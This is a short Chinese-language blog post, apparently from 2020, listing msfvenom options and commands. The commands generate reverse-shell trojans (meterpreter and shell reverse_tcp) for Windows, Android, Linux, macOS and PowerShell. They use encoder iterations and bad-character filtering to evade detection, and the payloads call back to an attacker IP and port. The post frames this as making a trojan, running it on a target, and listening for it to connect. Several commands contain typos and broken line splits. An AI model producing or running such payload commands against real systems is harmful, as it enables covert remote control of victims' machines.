msfvenom常见的使用命令

原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

使用说明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模块可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 为payload指定一个 nopsled 长度
-f, --format 指定输出格式,如exe等
-e, --encoder 使用编码器
-a, --arch 指定payload构架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻击荷载的最大长度
-b, --bad-chars 指定规避字符集,如: '\x00\xff‘
-i, --iterations 指定编码次数
-c, --add-code 指定一个附加的win32 shellcode 文件
-x, --template 指定一个可执行文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out 保存生成的payload
-v, --var-name 指定自定义变量
-h, --help 显示帮助文件

一、查看msfvenom支持的payload    msfvenom --list payload

二、查看msfvenom支持的平台         msfvenom --list platforms

三、查看msfvenom支持的编码格式  msfvenom --list encoders  其他的也是同理

使用Metaspoilt生成木马
msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.30.133 LPORT=12345 - e x86/shikata_ga_nai -b '\x00\xff' -i 3 -f exe -o chen.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST= =<攻击机IP> LPORT==<攻击机端口> -o
mm.apk
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机IP>
LPORT=<攻击机端口> -
f elf -o payload.elf
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机
端口> -f macho - o payload.macho
msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp LHOST=<攻击机IP>
LPORT=<攻击机端口> -e
cmd/powershell_base64 -i 3 -f raw -o payload.ps1

posted @ 2020-10-23 10:21  Samzhang1  阅读(1044)  评论(0编辑  收藏  举报